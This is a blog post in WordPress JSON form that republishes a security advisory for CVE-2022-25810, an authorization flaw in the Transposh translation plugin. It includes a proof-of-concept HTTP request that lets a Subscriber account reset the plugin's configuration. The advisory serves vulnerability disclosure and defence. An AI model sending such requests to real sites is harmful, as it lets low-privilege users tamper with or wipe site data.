{"id":28708,"date":"2022-07-30T11:19:13","date_gmt":"2022-07-30T07:19:13","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/167882\/wptransposh1081-auth.txt"},"modified":"2022-07-31T10:05:29","modified_gmt":"2022-07-31T05:35:29","slug":"transposh-wordpress-translation-1-0-8-1-improper-authorization","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/transposh-wordpress-translation-1-0-8-1-improper-authorization\/","title":{"rendered":"Transposh WordPress Translation 1.0.8.1 Improper Authorization"},"content":{"rendered":"<p dir=\"ltr\">RCE Security Advisory<br \/>\nhttps:\/\/www.rcesecurity.com<\/p>\n<p dir=\"ltr\">1. ADVISORY INFORMATION<br \/>\n=======================<br \/>\nProduct: Transposh WordPress Translation<br \/>\nVendor URL: https:\/\/wordpress.org\/plugins\/transposh-translation-filter-for-wordpress\/<br \/>\nType: Improper Authorization [CWE-285]\nDate found: 2022-02-21<br \/>\nDate published: 2022-07-22<br \/>\nCVSSv3 Score: 6.3 (CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:U\/C:L\/I:L\/A:L)<br \/>\nCVE: CVE-2022-25810<\/p>\n<p dir=\"ltr\">2. CREDITS<br \/>\n==========<br \/>\nThis vulnerability was discovered and researched by Julien Ahrens from<br \/>\nRCE Security.<\/p>\n<p dir=\"ltr\">3. VERSIONS AFFECTED<br \/>\n====================<br \/>\nTransposh WordPress Translation 1.0.8.1 and below<\/p>\n<p dir=\"ltr\">4. INTRODUCTION<br \/>\n===============<br \/>\nTransposh translation filter for WordPress offers a unique approach to blog<br \/>\ntranslation. It allows your blog to combine automatic translation with human<br \/>\ntranslation aided by your users with an easy to use in-context interface.<\/p>\n<p dir=\"ltr\">(from the vendor&#8217;s homepage)<\/p>\n<p dir=\"ltr\">5. VULNERABILITY DETAILS<br \/>\n========================<br \/>\nTransposh does not properly enforce authorization on functionalities available on<br \/>\nthe plugin&#8217;s &#8220;Utilities&#8221; page leading to unauthorized access for all user roles,<br \/>\nincluding &#8220;Subscriber&#8221;.<\/p>\n<p dir=\"ltr\">Some of the affected functionality is:<br \/>\ntp_backup &#8211; Initiate a new backup<br \/>\ntp_reset &#8211; Reset the plugin&#8217;s configuration<br \/>\ntp_cleanup &#8211; Delete automated translations<br \/>\ntp_dedup &#8211; Delete duplicates<br \/>\ntp_maint &#8211; Fix internal errors<br \/>\ntp_translate_all &#8211; Trigger an auto-translation of all entries<\/p>\n<p dir=\"ltr\">6. PROOF OF CONCEPT<br \/>\n===================<br \/>\nAn exemplary request to reset the plugin&#8217;s configuration, send the following<br \/>\nrequest using a &#8220;Subscriber&#8221; account:<\/p>\n<p dir=\"ltr\">POST \/wp-admin\/admin-ajax.php HTTP\/1.1<br \/>\nHost: localhost<br \/>\nContent-Length: 15<br \/>\nAccept: *\/*<br \/>\nContent-Type: application\/x-www-form-urlencoded; charset=UTF-8<br \/>\nX-Requested-With: XMLHttpRequest<br \/>\nUser-Agent: Mozilla\/5.0<br \/>\nAccept-Encoding: gzip, deflate<br \/>\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8<br \/>\nCookie: [your cookies]\nConnection: close<\/p>\n<p dir=\"ltr\">action=tp_reset<\/p>\n<p dir=\"ltr\">7. SOLUTION<br \/>\n===========<br \/>\nNone. Remove the plugin to prevent exploitation.<\/p>\n<p dir=\"ltr\">8. REPORT TIMELINE<br \/>\n==================<br \/>\n2022-02-21: Discovery of the vulnerability<br \/>\n2022-02-21: Contacted the vendor via email<br \/>\n2022-02-21: Vendor response<br \/>\n2022-02-22: CVE requested from WPScan (CNA)<br \/>\n2022-02-23: WPScan assigns CVE-2022-25810<br \/>\n2022-05-22: Sent request for status update on the fix<br \/>\n2022-05-24: Vendor states that there is no update planned so far<br \/>\n2022-07-22: Public disclosure<\/p>\n<p dir=\"ltr\">9. REFERENCES<br \/>\n=============<br \/>\nhttps:\/\/github.com\/MrTuxracer\/advisories<\/p>\n","protected":false},"excerpt":{"rendered":"<p>RCE Security Advisory https:\/\/www.rcesecurity.com 1. ADVISORY INFORMATION ======================= Product: Transposh WordPress Translation Vendor URL: https:\/\/wordpress.org\/plugins\/transposh-translation-filter-for-wordpress\/ Type: Improper Authorization [CWE-285] Date found: 2022-02-21 Date published: 2022-07-22 CVSSv3 Score: 6.3 (CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:U\/C:L\/I:L\/A:L) CVE: CVE-2022-25810 2. CREDITS ========== This vulnerability was discovered and researched by Julien Ahrens from RCE Security. 3. VERSIONS AFFECTED ==================== Transposh WordPress Translation 1.0.8.1 and &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-28708","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/28708","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=28708"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/28708\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=28708"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=28708"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=28708"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}